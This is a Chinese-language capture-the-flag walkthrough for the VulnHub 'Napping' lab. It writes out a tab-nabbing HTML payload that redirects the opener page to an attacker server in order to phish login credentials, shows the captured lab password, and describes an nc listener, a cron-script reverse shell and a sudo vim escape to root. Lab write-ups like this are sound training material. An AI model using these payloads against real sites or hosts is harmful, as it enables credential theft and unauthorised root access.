前期準備：

靶機地址：https://www.vulnhub.com/entry/napping-101,752/

kali攻擊機ip：192.168.11.129
靶機地址：192.168.11.137

一、資訊收集

1.使用nmap對靶機進行埠掃描

nmap -A -p 1-65535 192.168.11.137

發現開放了22和80埠。

2.收集80頁面的資訊

發現是個登入介面，還可以註冊，先註冊一個賬戶試試：

註冊完成後登入進去：

發現有個輸入框，看樣子是提交連線，隨便寫入一個地址試試：

提交之後再點選 Here 會跳轉到你輸入的連線：

檢視原始碼，發現站點上的此特定 URL 連結功能容易受到 Tab Nabbing 的攻擊

二、漏洞攻擊

1.釣魚

知道了使用 Tab Nabbing 攻擊後，我們先做個釣魚介面，首先先複製登入介面：

接下來，我們構建我們的惡意 html （sain.html）介面：

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
    </script>
</body>
</html>
 

把自己複製的 index.php 和 sain.html 頁面放到 /var/www/html 下，並且開啟 python3-http 服務，開的 80 埠，和 sain.html 中的埠區分開：

監聽惡意 html 中的 8000 埠， nc -lvvp 8000 在靶機的提交連線介面提交 python3-http 服務下的 sain.html 地址：

點選提交即可，等了一會監聽的 8000 埠返回了資料包：

靶機中設定的隔幾分鐘就會用使用者登入，此時我們獲取了資料包

username=daniel
password=C@ughtm3napping123

得到了使用者名稱和密碼，我們可以通過ssh進行登入。

2.ssh登入

檢視一下使用者資訊：

可以看到 daniel 是管理員組的一部分。

使用 find 我們可以查詢任何我們可以使用命令訪問的有趣檔案

find / -group administrators -type f 2>/dev/null

檢視一下 query.py 檔案：

根據site_status.txt檔案，它似乎每 2 分鐘執行一次：

三、提權

我們需要先跳轉到 adrian 使用者，所以我們繼續在 /dev/shm 目錄中建立一個反向 shell bash 指令碼：

直接執行的話還是 daniel 使用者，我們需要更改一下 query.py 這個個指令碼來讓他定時反彈shell：

nc 監聽，等了一會得到反向shell：

獲得 adrian 使用者，檢視以下許可權：

發現可以再沒有在沒有密碼的情況下以 root 身份執行 vim ，那就直接寫入 Vim-shell：

sudo /usr/bin/vim -c ':!/bin/sh'

得到root：